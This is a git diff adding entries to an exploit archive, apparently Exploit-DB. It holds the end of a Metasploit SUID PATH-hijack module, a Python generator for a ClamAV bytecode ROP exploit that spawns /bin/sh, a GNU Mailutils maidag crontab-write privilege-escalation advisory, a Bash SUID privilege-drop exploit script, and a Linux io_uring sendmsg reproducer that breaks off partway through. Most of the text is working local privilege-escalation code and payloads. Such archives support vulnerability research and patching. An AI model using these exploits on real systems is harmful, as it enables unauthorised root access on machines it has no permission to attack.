+        return CheckCode::Safe
+      end
+
+      return CheckCode::Appears
+    end
+
+    vprint_error("Could not parse omniresolve -ver output")
+    CheckCode::Detected
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    payload_path = File.join(base_dir, 'oracleasm')
+    register_file_for_cleanup(payload_path)
+    write_file(payload_path, generate_payload_exe)
+    chmod(payload_path)
+
+    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    register_file_for_cleanup(trigger_path)
+    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
+    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47687.py b/exploits/linux/local/47687.py
new file mode 100755
index 000000000..dd518ba13
--- /dev/null
+++ b/exploits/linux/local/47687.py
@@ -0,0 +1,657 @@
+#!/usr/bin/python
+ 
+'''
+Finished  : 22/07/2019
+Pu8lished : 31/10/2019
+Versi0n   : Current    (<= 0.102.0)
+Result    : Just for fun.
+ 
+"Because of my inability to change the world."
+ 
+In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on
+a signature-based detection approach, and still undergoes active-development. by that time,
+LibClamAV only held 2 binaries, and expanded to 5 at present.
+ 
+ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly
+validating and interpreting the code therein, and the information provided didn't indicate
+nor explain the presence of its internal mechanisms.
+ 
+The availability of the source-code and the lack of documentation led to the establishment
+of this paper, it was certainly not an attempt to escalate privileges, but rather a sought
+-after experience, and source of entertainment that grants the thrill of a challenge.
+ 
+Due to the considerable amount of time spent in the analysis, the dissection of the engine
+was imminent, whilst significantly broadening our perception on its internal structures.
+The trial and error process produced valuable information, crashes illuminated latent bugs,
+effectively increasing the attack surface, and magnifying the possibility for exploitation.
+ 
+> ./exploit.py
+> clambc --debug exploit
+[SNIP]
+$
+'''
+ 
+names = ['test1',
+         'read',
+         'write',
+         'seek',
+         'setvirusname',
+         'debug_print_str',
+         'debug_print_uint',
+         'disasm_x86',
+         'trace_directory',
+         'trace_scope',
+         'trace_source',
+         'trace_op',
+         'trace_value',
+         'trace_ptr',
+         'pe_rawaddr',
+         'file_find',
+         'file_byteat',
+         'malloc',
+         'test2',
+         'get_pe_section',
+         'fill_buffer',
+         'extract_new',
+         'read_number',
+         'hashset_new',
+         'hashset_add',
+         'hashset_remove',
+         'hashset_contains',
+         'hashset_done',
+         'hashset_empty',
+         'buffer_pipe_new',
+         'buffer_pipe_new_fromfile',
+         'buffer_pipe_read_avail',
+         'buffer_pipe_read_get',
+         'buffer_pipe_read_stopped',
+         'buffer_pipe_write_avail',
+         'buffer_pipe_write_get',
+         'buffer_pipe_write_stopped',
+         'buffer_pipe_done',
+         'inflate_init',
+         'inflate_process',
+         'inflate_done',
+         'bytecode_rt_error',
+         'jsnorm_init',
+         'jsnorm_process',
+         'jsnorm_done',
+         'ilog2',
+         'ipow',
+         'iexp',
+         'isin',
+         'icos',
+         'memstr',
+         'hex2ui',
+         'atoi',
+         'debug_print_str_start',
+         'debug_print_str_nonl',
+         'entropy_buffer',
+         'map_new',
+         'map_addkey',
+         'map_setvalue',
+         'map_remove',
+         'map_find',
+         'map_getvaluesize',
+         'map_getvalue',
+         'map_done',
+         'file_find_limit',
+         'engine_functionality_level',
+         'engine_dconf_level',
+         'engine_scan_options',
+         'engine_db_options',
+         'extract_set_container',
+         'input_switch',
+         'get_environment',
+         'disable_bytecode_if',
+         'disable_jit_if',
+         'version_compare',
+         'check_platform',
+         'pdf_get_obj_num',
+         'pdf_get_flags',
+         'pdf_set_flags',
+         'pdf_lookupobj',
+         'pdf_getobjsize',
+         'pdf_getobj',
+         'pdf_getobjid',
+         'pdf_getobjflags',
+         'pdf_setobjflags',
+         'pdf_get_offset',
+         'pdf_get_phase',
+         'pdf_get_dumpedobjid',
+         'matchicon',
+         'running_on_jit',
+         'get_file_reliability',
+         'json_is_active',
+         'json_get_object',
+         'json_get_type',
+         'json_get_array_length',
+         'json_get_array_idx',
+         'json_get_string_length',
+         'json_get_string',
+         'json_get_boolean',
+         'json_get_int']
+o     = names.index('buffer_pipe_new') + 1
+k     = names.index('buffer_pipe_write_get') + 1
+l     = names.index('debug_print_str') + 1
+m     = names.index('malloc') + 1
+ 
+c     = 0
+for name in names:
+    names[c] = name.encode('hex')
+    c += 1
+ 
+def cc(n):
+    v = chr(n + 0x60)
+   
+    return v
+ 
+def cs(s):
+    t = ''
+       
+    for i in xrange(0, len(s), 2):
+        u  = int(s[i], 16)
+        l  = int(s[i + 1], 16)
+        for i in  [u, l]:
+            if((i >= 0 and i <= 0xf)):
+                continue
+            print 'Invalid string.'
+            exit(0)
+       
+        t += cc(l) + cc(u)
+   
+    return t
+   
+def wn(n, fixed=0, size=0):
+    if n is 0:
+        return cc(0)
+ 
+    t  = ''
+    c  = hex(n)[2:]
+    l  = len(c)
+    if (l % 2) is 1:
+        c = "0" + c
+    r  = c[::-1]
+   
+    if(l <= 0x10):
+        if not fixed:
+            t = cc(l)
+        i = 0
+        while i < l:
+            t += cc(int(r[i], 16))
+            i += 1
+    else:
+        print 'Invalid number.'
+        exit(0)
+   
+    if size != 0:
+        t = t.ljust(size, '`')
+       
+    return t
+ 
+def ws(s):
+    t  = '|'
+    e = s[-2:]
+    if(e != '00'):
+        print '[+] Adding null-byte at the end of the string..'
+        s += '00'
+   
+    l  = (len(s) / 2)
+   
+    if (len(s) % 2) is 1:
+        print 'Invalid string length.'
+        exit(0)
+   
+    t += wn(l)
+    t += cs(s)
+   
+    return t
+   
+def wt(t):
+    if t < (num_types + 0x45):
+        v = wn(t)
+        return v
+    else:
+        print 'Invalid type.'
+        exit(0)
+ 
+def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096):
+    global flimit, num_types
+   
+    if maxfunc is 0:
+        maxfunc = flimit
+   
+    if(minfunc > flimit or  maxfunc < flimit):
+        print 'Invalid minfunc and/or maxfunc.'
+        exit(0)
+   
+    header   = "ClamBC"
+    header  += wn(0x07)                 # formatlevel(6, 7)
+    header  += wn(0x88888888)           # timestamp
+    header  += ws("416c69656e")         # sigmaker
+    header  += wn(0x00)                 # targetExclude
+    header  += wn(0x00)                 # kind
+    header  += wn(minfunc)              # minfunc
+    header  += wn(maxfunc)              # maxfunc
+    header  += wn(0x00)                 # maxresource
+    header  += ws("00")                 # compiler
+    header  += wn(num_types + 5)        # num_types
+    header  += wn(num_func)             # num_func
+    header  += wn(0x53e5493e9f3d1c30)   # magic1
+    header  += wn(0x2a, 1)              # magic2
+    header  += ':'
+    header  += str(linelength)
+    header  += chr(0x0a)*2
+    return header
+ 
+def prepare_types(contained, type=1, nume=1):
+    global num_types
+   
+    types    = "T"
+    types   += wn(0x45, 1)               # start_tid(69)
+   
+    for i in range(0, num_types):
+        types   += wn(type[i], 1)            # kind
+        if type[i] in [1, 2, 3]:
+        # Function, PackedStruct, Struct
+            types += wn(nume[i])             # numElements
+            for j in range(0, nume[i]):
+                types += wt(contained[i][j]) # containedTypes[j]
+        else:
+        # Array, Pointer
+            if type[i] != 5:
+                types += wn(nume[i])         # numElements
+            types += wt(contained[i][0])     # containedTypes[0]
+       
+    types   += chr(0x0a)
+    return types
+   
+def prepare_apis(calls=1):
+    global maxapi, names, ids, tids
+ 
+    if(calls > max_api):
+        print 'Invalid number of calls.'
+        exit(0)
+   
+    apis     = 'E'
+    apis    += wn(max_api)               # maxapi
+    apis    += wn(calls)                 # calls(<= maxapi)
+   
+    for i in range(0, calls):
+        apis += wn(ids[i])               # id
+        apis += wn(tids[i])              # tid
+        apis += ws(names[ids[i] - 1])    # name
+   
+    apis    += chr(0x0a)
+    return apis
+   
+def prepare_globals(numglobals=1):
+    global max_globals, type, gval
+   
+    globals  = 'G'
+    globals += wn(max_globals)           # maxglobals
+    globals += wn(numglobals)            # numglobals
+   
+    for i in range(0, numglobals):
+        globals += wt(type[i])           # type
+        for j in gval[i]:                # subcomponents
+            n        = wn(j)
+            globals += chr(ord(n[0]) - 0x20)
+            globals += n[1:]
+       
+    globals += cc(0)
+    globals += chr(0x0a)
+    return globals
+ 
+def prepare_function_header(numi, numbb, numa=1, numl=0):
+    global allo
+   
+    if numa > 0xf:
+        print 'Invalid number of arguments.'
+        exit(0)
+ 
+    fheader  = 'A'
+    fheader += wn(numa, 1)               # numArgs
+    fheader += wt(0x20)                  # returnType
+    fheader += 'L'
+    fheader += wn(numl)                  # numLocals
+   
+    for i in range(0, numa + numl):
+        fheader += wn(type[i])           # types
+        fheader += wn(allo[i], 1)        # | 0x8000
+       
+    fheader += 'F'
+    fheader += wn(numi)                  # numInsts
+    fheader += wn(numbb)                 # numBB
+    fheader += chr(0x0a)
+    return fheader
+   
+ 
+   
+flimit      = 93
+max_api     = 100
+max_globals = 32773
+ 
+num_types   = 6
+ 
+ 
+# Header parsing
+w    = initialize_header(num_func=0x1)
+# Types parsing
+cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]]
+type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1]
+num  = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2]
+w   += prepare_types(cont, type, num)
+# API parsing
+ids  = [o, k, l, m]
+tids = [71, 72, 73, 74]
+w   += prepare_apis(0x4)
+'''
+# crash @ id=0
+'''
+# Globals parsing
+type = [0x45]
+gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]]
+w   += prepare_globals(0x1)
+# Function header parsing
+type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20]
+allo = [   1,    0,    0,    0,    0,    0,    0]
+w   += prepare_function_header(35, 0x1, 0x0, 0x7)
+# BB parsing
+p  = 'B'
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += '@d'
+ 
+# STORE (0x0068732f6e69622f(L=8) -> ([Var #1]))
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += 'Nobbfifnfobcghfh'
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'C`fcd'
+ 
+# LOAD Var #2 = ([Var #1])
+p += wn(0x40)
+p += wn(0x2)
+p += wn(0x27, 1)
+p += wn(0x1)
+ 
+# SUB Var #2 -= 0xd260
+p += wn(0x40)
+p += wn(0x2)
+p += wn(0x2, 1, 2)
+p += wn(0x2)
+p += 'D`fbmd'
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'B`ad'
+ 
+# LOAD Var #3 = ([Var #1])
+p += wn(0x40)
+p += wn(0x3)
+p += wn(0x27, 1)
+p += wn(0x1)
+ 
+# SUB Var #3 -= 0x10
+p += wn(0x40)
+p += wn(0x3)
+p += wn(0x2, 1, 2)
+p += wn(0x3)
+p += 'B`ad'
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'B`cd'
+ 
+# LOAD Var #4 = ([Var #1])
+p += wn(0x40)
+p += wn(0x4)
+p += wn(0x27, 1)
+p += wn(0x1)
+ 
+# SUB Var #4 -= 0x190
+p += wn(0x40)
+p += wn(0x4)
+p += wn(0x2, 1, 2)
+p += wn(0x4)
+p += 'C`iad'
+ 
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'Bhcd'
+ 
+# STORE (Var #3 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += wn(0x3)
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'Bhdd'
+ 
+# ADD Var #3 += 0x3
+p += wn(0x40)
+p += wn(0x3)
+p += wn(0x2, 1, 2)
+p += wn(0x3)
+p += 'Acd'
+ 
+# STORE (Var #3 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += wn(0x3)
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'Bhbd'
+ 
+# ADD Var #5 += Var #2 + 0xcbda
+p += wn(0x40)
+p += wn(0x5)
+p += wn(0x1, 1, 2)
+p += wn(0x2)
+p += 'Djmkld'
+ 
+# STORE (Var #5 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += wn(0x5)
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'B`bd'
+ 
+# STORE (Var #4 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += wn(0x4)
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'Bhad'
+ 
+# ADD Var #5 += Var #2 + 0x99dc
+p += wn(0x40)
+p += wn(0x5)
+p += wn(0x1, 1, 2)
+p += wn(0x2)
+p += 'Dlmiid'
+ 
+# STORE (Var #5 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += wn(0x5)
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'B`ad'
+ 
+# STORE (0x3b -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += 'Bkcd'
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'B`cd'
+ 
+# STORE (0x0 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += '@d'
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'B`dd'
+ 
+# STORE (0x0 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += '@d'
+p += wn(0x1)
+ 
+# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8)
+p += wn(0x0)
+p += wn(0x1)
+p += wn(0x24, 1)
+p += wn(0x46)
+p += wn(0x0)
+p += 'Ahd'
+ 
+# ADD Var #2 += 0x6d68
+p += wn(0x40)
+p += wn(0x2)
+p += wn(0x1, 1, 2)
+p += wn(0x2)
+p += 'Dhfmfd'
+ 
+# STORE (Var #2 -> Var #1)
+p += wn(0x40)
+p += wn(0x0)
+p += wn(0x26, 1)
+p += wn(0x2)
+p += wn(0x1)
+ 
+'''
+0x99dc : pop rdi ; ret
+0xcbda : pop rsi ; ret
+0x6d68 : pop rax ; ret
+ 
+Var #2 = text_base
+Var #3 = syscall       (+3: pop rdx; ret)
+Var #4 = "/bin/sh\x00"
+ 
+pop rax; ret; o  0x8
+59            o  0x10
+pop rdi; ret; o  0x18
+sh; address   o  0x20
+pop rsi; ret; o  0x28
+0x0           o  0x30
+pop rdx; ret; o  0x38
+0x0           o  0x40
+syscall       o  0x48
+'''
+ 
+# COPY Var #6 = (0x5a90050f(o`e``ije))
+p += wn(0x20)
+p += wn(0x0)
+p += wn(0x22, 1)
+p += 'Ho`e``ijeh'
+p += wn(0x6)
+ 
+p += 'T'
+p += wn(0x13, 1)
+p += wn(0x20)
+p += wn(0x6)
+p += 'E'
+ 
+w += p
+f  = open("exploit", "w")
+f.write(w)
+f.close()
+ 
+print '[+] Generated payload'
+ 
+'''
+Mortals represent immorality, clueless, they crush each other in an everlasting
+pursuit to climb the ladder of social-status, greed is engraved in their nature,
+they're materialistic, and the essence of their lives is money and wealth.
+However, such definition is inaccurate as it doesn't apply to the minority.
+I have discovered a truly marvelous proof of their existence, which this margin
+is too narrow to contain.
+ 
+- Alien599, not Fermat.
+ 
+Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641.
+X
+'''
\ No newline at end of file
diff --git a/exploits/linux/local/47703.txt b/exploits/linux/local/47703.txt
new file mode 100644
index 000000000..c7afa1000
--- /dev/null
+++ b/exploits/linux/local/47703.txt
@@ -0,0 +1,138 @@
+# Exploit Title: GNU Mailutils 3.7 - Local Privilege Escalation
+# Date: 2019-11-06
+# Exploit Author: Mike Gualtieri
+# Vendor Homepage: https://mailutils.org/
+# Software Link: https://ftp.gnu.org/gnu/mailutils/mailutils-3.7.tar.gz
+# Version: 2.0 <= 3.7
+# Tested on: Gentoo
+# CVE : CVE-2019-18862
+
+Title   : GNU Mailutils / Maidag Local Privilege Escalation
+Author  : Mike Gualtieri :: https://www.mike-gualtieri.com
+Date    : 2019-11-06
+Updated : 2019-11-20
+
+Vendor Affected:   GNU Mailutils :: https://mailutils.org/
+Versions Affected: 2.0 - 3.7
+CVE Designator:    CVE-2019-18862
+
+
+1. Overview
+
+The --url parameter included in the GNU Mailutils maidag utility (versions 2.0
+through 3.7) can abused to write to arbitrary files on the host operating
+system.  By default, maidag is set to execute with setuid root permissions,
+which can lead to local privilege escalation through code/command execution by
+writing to the system's crontab or by writing to other root owned files on the
+operating system.
+
+
+
+2. Detail
+
+As described by the project's homepage, "GNU Mailutils is a swiss army knife of 
+electronic mail handling. It offers a rich set of utilities and daemons for
+processing e-mail".
+
+Maidag, a mail delivery agent utility included in the suite, is by default
+marked to execute with setuid (suid) root permissions.
+
+The --url parameter of maidag can be abused to write to arbitrary files on the 
+operating system.  Abusing this option while the binary is marked with suid 
+permissions allows a low privileged user to write to arbitrary files on the 
+system as root.  Writing to the crontab, for example, may lead to a root shell.
+
+The flaw itself appears to date back to the 2008-10-19 commit, when the --url 
+parameter was introduced to maidag.
+
+	11637b0f - New maidag mode: --url
+	https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=11637b0f262db62b4dc466cefb9315098a1a995a
+
+	maidag/Makefile.am:
+    	chmod 4755 $(DESTDIR)$(sbindir)/$$i;\
+
+
+The following payload will execute arbitrary commands as root and works with 
+versions of maidag, through version 3.7.
+
+	maidag  --url /etc/crontab < /tmp/crontab.in
+
+	The file /tmp/crontab.in would contain a payload like the following.  
+
+	line 1:
+	line 2: */1  *  * * *  root    /tmp/payload.sh
+
+	Please note: For the input to be accepted by maidag, the first line of the
+    file must be blank or be commented.
+
+	In the above example, the file /tmp/payload.sh would include arbitrary 
+    commands to execute as root.
+
+
+Older versions of GNU Mailutils (2.2 and previous) require a different syntax:
+
+	maidag --url 'mbox://user@localhost //etc/crontab' < /tmp/crontab.in
+
+
+
+3. Solution
+
+A fix for the flaw has been made in GNU Mailutils 3.8, which removes the maidag 
+utility, and includes three new utilities that replace its functionality.  
+Details about the new features can be found in the project's release notes:
+
+	https://git.savannah.gnu.org/cgit/mailutils.git/tree/NEWS
+
+Another workaround for those unable to upgrade, is to remove the suid bit on 
+/usr/sbin/maidag (e.g. `chmod u-s /usr/sbin/maidag`).
+
+It should be noted that some Linux distributions already remove the suid bit
+from maidag by default, nullifying this privilege escalation flaw.
+
+Another patch has been made available by Sergey Poznyakoff and posted to the
+GNU Mailutils mailing list, which removes the setuid bit for maidag in all but
+required cases.  The patch is intended for users who can not yet upgrade to
+mailutils 3.8.  The patch has also been made available here:
+https://www.mike-gualtieri.com/files/maidag-dropsetuid.patch
+
+
+
+4. Additional Comments
+
+This vulnerability disclosure was submitted to MITRE Corporation for inclusion
+in the Common Vulnerabilities and Exposures (CVE) database.  The designator
+CVE-2019-18862 has been assigned.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18862
+https://nvd.nist.gov/vuln/detail/CVE-2019-18862
+
+The NIST National Vulnerability Database (NVD) has assigned the following
+ratings:
+
+CVSS 3.x Severity and Metrics: Base Score: 7.8 HIGH
+CVSS 2.0 Severity and Metrics: Base Score: 4.6 MEDIUM
+
+This disclosure will be updated as new information becomes available.  
+
+
+
+5. History
+
+2019-10-09 Informed Sergey Poznyakoff <gray@gnu.org.ua> of security issue
+
+2019-10-10 Reply from Sergey acknowledging the issue
+
+2019-10-12 Fix available in the GNU Mailutils git repository:
+           739c6ee5 - Split maidag into three single-purpose tools
+           https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=739c6ee525a4f7bb76b8fe2bd75e81a122764ced
+
+2019-11-06 GNU Mailutils Version 3.8 released to close the issue
+
+2019-11-06 Submission of this vulnerability disclosure to MITRE Corporate to
+           obtain a CVE designator
+
+2019-11-07 Patch offered by Sergey for those unable to upgrade to version 3.8
+
+2019-11-11 CVE-2019-18862 assigned to flaw
+
+2019-11-20 Vulnerability disclosure made publicly available
\ No newline at end of file
diff --git a/exploits/linux/local/47726.sh b/exploits/linux/local/47726.sh
new file mode 100755
index 000000000..23d92a16d
--- /dev/null
+++ b/exploits/linux/local/47726.sh
@@ -0,0 +1,62 @@
+# Exploit Title : Bash 5.0 Patch 11 -  SUID Priv Drop Exploit
+# Date : 2019-11-29
+# Original Author: Ian Pudney , Chet Ramey
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : < Bash 5.0 Patch 11
+# Tested on Linux
+# Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
+# CVE : 2019-18276
+# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
+# Exploit Demo POC : https://youtu.be/Dbwvzbb38W0
+
+Description :
+
+An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11.
+By default, if Bash is run with its effective UID not equal to its real UID,
+it will drop privileges by setting its effective UID to its real UID.
+However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality,
+the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for
+runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore
+regains privileges. However, binaries running with an effective UID of 0 are unaffected.
+
+#!/bin/bash
+#Terminal Color Codes
+
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+NC='\033[0m'
+
+#Get the Effective User ID (owner of the SUID /bin/bash binary)
+read -p "Please enter effective user id (euid) : " euid
+#Create a C file and output the exploit code
+touch pwn.c
+echo "" > pwn.c
+cat <<EOT >> pwn.c
+
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdio.h>
+ 
+void __attribute((constructor)) initLibrary(void) {
+        printf("Escape lib is initialized");
+        printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid());  
+        setuid($euid);
+        printf("[LO] uid%d | euid:%d%c", getuid(), geteuid());
+}
+
+EOT
+echo -e  "${RED}"
+echo -e "Exploit Code copied to pwn.c !\n"
+sleep 5
+echo -e "Compiling Exploit Object ! \n"
+$(which gcc ) -c -fPIC pwn.c -o pwn.o
+sleep 5
+echo -e "Compiling Exploit Shared Object ! \n"
+$(which gcc ) -shared -fPIC pwn.o -o libpwn.so
+sleep 5
+echo -e "Exploit Compiled ! \n"
+sleep 5
+echo -e "Executing Exploit :)  \n"
+sleep 5
+#Execute the Shared Library
+echo -e "${RED}Run  : ${NC} enable -f ./libpwn.so asd \n"
\ No newline at end of file
diff --git a/exploits/linux/local/47779.txt b/exploits/linux/local/47779.txt
new file mode 100644
index 000000000..d4ba35d70
--- /dev/null
+++ b/exploits/linux/local/47779.txt
@@ -0,0 +1,206 @@
+Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3),
+io_uring has support for asynchronously calling sendmsg().
+Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
+entries, which cause sendmsg() to be called either in syscall context in the
+original task, or - if that wasn't able to send a message without blocking - on
+a kernel worker thread.
+
+The problem is that sendmsg() can end up looking at the credentials of the
+calling task for various reasons; for example:
+
+ - sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
+   datagram socket ends up performing filesystem access checks
+ - sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
+   process credentials
+ - sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
+   capability checks against the calling process
+
+When the request has been handed off to a kernel worker task, all such checks
+are performed against the credentials of the worker - which are default kernel
+creds, with UID 0 and full capabilities.
+
+To force io_uring to hand off a request to a kernel worker thread, an attacker
+can abuse the fact that the opcode field of the SQE is read multiple times, with
+accesses to the struct msghdr in between: The attacker can first submit an SQE
+of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and
+then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG.
+
+Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
+IPv4 address to the loopback interface without having the required privileges
+for that:
+
+==========================================================================
+$ cat uring_sendmsg.c 
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/ioctl.h>
+#include <linux/rtnetlink.h>
+#include <linux/if_addr.h>
+#include <linux/io_uring.h>
+#include <linux/userfaultfd.h>
+#include <linux/netlink.h>
+
+#define SYSCHK(x) ({          \
+  typeof(x) __res = (x);      \
+  if (__res == (typeof(x))-1) \
+    err(1, "SYSCHK(" #x ")"); \
+  __res;                      \
+})
+
+static int uffd = -1;
+static struct iovec *iov;
+static struct iovec real_iov;
+static struct io_uring_sqe *sqes;
+
+static void *uffd_thread(void *dummy) {
+  struct uffd_msg msg;
+  int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
+  if (res != sizeof(msg)) errx(1, "uffd read");
+  printf("got userfaultfd message\n");
+
+  sqes[0].opcode = IORING_OP_SENDMSG;
+
+  union {
+    struct iovec iov;
+    char pad[0x1000];
+  } vec = {
+    .iov = real_iov
+  };
+  struct uffdio_copy copy = {
+    .dst = (unsigned long)iov,
+    .src = (unsigned long)&vec,
+    .len = 0x1000
+  };
+  SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
+  return NULL;
+}
+
+int main(void) {
+  // initialize uring
+  struct io_uring_params params = { };
+  int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
+  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
+  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
+  sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));
+
+  // prepare userfaultfd-trapped IO vector page
+  iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
+  uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
+  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
+  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
+  struct uffdio_register reg = {
+    .mode = UFFDIO_REGISTER_MODE_MISSING,
+    .range = { .start = (unsigned long)iov, .len = 0x1000 }
+  };
+  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
+  pthread_t thread;
+  if (pthread_create(&thread, NULL, uffd_thread, NULL))
+    errx(1, "pthread_create");
+
+  // construct netlink message
+  int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
+  struct sockaddr_nl addr = {
+    .nl_family = AF_NETLINK
+  };
+  struct {
+    struct nlmsghdr hdr;
+    struct ifaddrmsg body;
+    struct rtattr opthdr;
+    unsigned char addr[4];
+  } __attribute__((packed)) msgbuf = {
+    .hdr = {
+      .nlmsg_len = sizeof(msgbuf),
+      .nlmsg_type = RTM_NEWADDR,
+      .nlmsg_flags = NLM_F_REQUEST
+    },
+    .body = {
+      .ifa_family = AF_INET,
+      .ifa_prefixlen = 32,
+      .ifa_flags = IFA_F_PERMANENT,
+      .ifa_scope = 0,
+      .ifa_index = 1
+    },
+    .opthdr = {
+      .rta_len = sizeof(struct rtattr) + 4,
+      .rta_type = IFA_LOCAL
+    },
+    .addr = { 1, 2, 3, 4 }
+  };
